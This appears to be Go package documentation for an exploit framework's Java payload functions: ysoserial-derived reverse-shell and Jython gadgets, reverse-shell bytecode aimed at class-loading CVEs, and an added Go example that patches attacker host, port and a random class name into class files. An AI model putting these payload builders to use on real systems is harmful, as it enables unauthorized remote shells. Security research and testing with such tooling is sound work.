Documentation
Index
Constants
This section is empty.
Variables
This section is empty.
Functions
func CreateBeanutilsReverseShell
This is a serialized Java reverse shell. The gadget was generated by ysoserial using the code from this pull request: https://github.com/frohoff/ysoserial/pull/96. It was then modified so that the desired lhost and lport can be swapped in without regenerating the gadget.
The gadget works on both Windows and Linux: at runtime it detects the platform and picks the interpreter used to execute commands accordingly (cmd.exe or /bin/bash).
func CreateJythonRunCodeGadget added in v1.1.0
This function generates a serialized Jython payload that executes arbitrary Python. It is the "runcode" variation of Steven Seeley and Rocco Calvi's Jython2 gadget:
https://github.com/frohoff/ysoserial/pull/200/files
The payload can be used like so:
    java.CreateJythonRunCodeGadget(payload.UnflattenedSecureReversePython27(conf.Lhost, conf.Lport))
The payload was serialized with, and tested on, Java 11.
func ReverseShellBytecode added in v1.8.1
This is the Java bytecode for a reverse shell. The source code is here:
https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508
The code checks whether the victim is Windows or Linux and uses cmd.exe or bash accordingly. The use case is remotely loading a class (see CVE-2020-7961) or loading a class from a byte string (see CVE-2023-22527).
The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
    albinolobster@mournland:/tmp/java$ java -version
    openjdk version "1.8.0_392"
    OpenJDK Runtime Environment (build 1.8.0_392-8u392-ga-1~20.04-b08)
    OpenJDK 64-Bit Server VM (build 25.392-b08, mixed mode)
    albinolobster@mournland:/tmp/java$ javac ABCDEFG.java
    albinolobster@mournland:/tmp/java$ ls -l ABCDEFG.class
    -rw-rw-r-- 1 albinolobster albinolobster 2129 Feb 17 06:08 ABCDEFG.class
This function replaces the hardcoded IP address and port in that bytecode and substitutes a random class name. The return values are (bytecode, classname).
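Both the Beanutils gadget above (lhost and lport swapped into a serialized stream) and this function (IP, port and class name swapped into a class file) hit the same detail: the strings sit in length-prefixed records, so a replacement that is not exactly as long as the placeholder must rewrite the prefix rather than overwrite bytes in place. In a class file they are CONSTANT_Utf8 constant-pool entries (a u2 byte count followed by modified UTF-8); in a Java serialization stream, TC_STRING records use the same u2-prefixed encoding. The example below is added here and is not the package's own implementation: it walks a class file's constant pool and re-encodes the matching entries. The class bytes, the placeholder strings "10.0.0.1" and "4444", the decision to keep the port as a string constant, and the function names are assumptions of the example; only "ABCDEFG" as the original class name comes from the page.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Payload sizes of the fixed-length constant_pool tags. CONSTANT_Utf8 (tag 1) is
// variable length: a u2 byte count followed by that many modified-UTF-8 bytes.
var cpFixedSize = map[byte]int{
	3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
	15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2,
}

// parseConstantPool returns each pool entry as a raw slice (tag byte first) plus the bytes after the pool.
func parseConstantPool(class []byte) ([][]byte, []byte, error) {
	if len(class) < 10 || binary.BigEndian.Uint32(class) != 0xCAFEBABE {
		return nil, nil, errors.New("not a class file")
	}
	count := int(binary.BigEndian.Uint16(class[8:10]))
	entries, pos := [][]byte{}, 10
	for i := 1; i < count; i++ { // indices are 1-based; slot 0 is unused
		if pos+3 > len(class) { // every entry is at least a tag plus two bytes
			return nil, nil, errors.New("truncated constant pool")
		}
		tag := class[pos]
		size, ok := cpFixedSize[tag]
		if tag == 1 {
			size, ok = 2+int(binary.BigEndian.Uint16(class[pos+1:pos+3])), true
		}
		if !ok || pos+1+size > len(class) {
			return nil, nil, fmt.Errorf("bad or truncated entry (tag %d) at offset %d", tag, pos)
		}
		entries = append(entries, class[pos:pos+1+size])
		pos += 1 + size
		if tag == 5 || tag == 6 { // CONSTANT_Long and CONSTANT_Double take two slots
			i++
		}
	}
	return entries, class[pos:], nil
}

// PatchClassStrings rewrites each CONSTANT_Utf8 entry whose text is a key of repl and
// re-encodes its u2 length; an in-place overwrite would leave a stale length behind.
func PatchClassStrings(class []byte, repl map[string]string) ([]byte, error) {
	entries, rest, err := parseConstantPool(class)
	if err != nil {
		return nil, err
	}
	var out bytes.Buffer
	out.Write(class[:10]) // magic, version and constant_pool_count are unchanged
	for _, e := range entries {
		if r, ok := repl[string(e[3:])]; ok && e[0] == 1 {
			if len(r) > 0xFFFF {
				return nil, errors.New("replacement does not fit a u2 length")
			}
			out.Write([]byte{1, byte(len(r) >> 8), byte(len(r))})
			out.WriteString(r)
		} else {
			out.Write(e) // not a Utf8 entry, or not a placeholder: copy verbatim
		}
	}
	out.Write(rest)
	return out.Bytes(), nil
}

// RandomClassName returns n random ASCII letters: a valid Java identifier that is exactly n bytes in the pool.
func RandomClassName(n int) (string, error) {
	const letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
	b := make([]byte, n)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	for i := range b {
		b[i] = letters[int(b[i])%len(letters)] // small modulo bias; fine for a name
	}
	return string(b), nil
}

// sampleClass is a constructed stand-in, not the real reverse-shell bytecode: a valid header
// and pool with assumed placeholders (host, port kept as a string, class name), then six filler bytes.
var sampleClass = []byte{
	0xCA, 0xFE, 0xBA, 0xBE, 0x00, 0x00, 0x00, 0x34, // magic, minor 0, major 52 (Java 8)
	0x00, 0x05, // constant_pool_count = 5, i.e. four entries
	0x01, 0x00, 0x08, '1', '0', '.', '0', '.', '0', '.', '1', // #1 Utf8 "10.0.0.1"
	0x01, 0x00, 0x04, '4', '4', '4', '4', // #2 Utf8 "4444"
	0x01, 0x00, 0x07, 'A', 'B', 'C', 'D', 'E', 'F', 'G', // #3 Utf8 "ABCDEFG"
	0x07, 0x00, 0x03, // #4 Class -> #3
	0x00, 0x21, 0x00, 0x04, 0x00, 0x00, // access_flags, this_class = #4, super_class (filler)
}

func main() { // mirrors the (bytecode, classname) pair the page describes
	name, _ := RandomClassName(7)
	bc, err := PatchClassStrings(sampleClass, map[string]string{"10.0.0.1": "192.168.1.100", "4444": "9001", "ABCDEFG": name})
	fmt.Printf("class %s, %d bytes, err=%v\n%x\n", name, len(bc), err, bc)
}
```

Two things to check before relying on a single swap against a real javac-built class: a port written as an int literal in the source does not live in the pool at all (it is a sipush operand inside the method's Code attribute, or an ldc of a CONSTANT_Integer for values outside the short range), which is why this sample keeps it as a string; and the class name may appear in more than one Utf8 entry (the SourceFile attribute holds "ABCDEFG.java", and self-references produce descriptors such as "LABCDEFG;"), so list the pool's Utf8 entries and decide which ones the rename must touch.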
Types
This section is empty.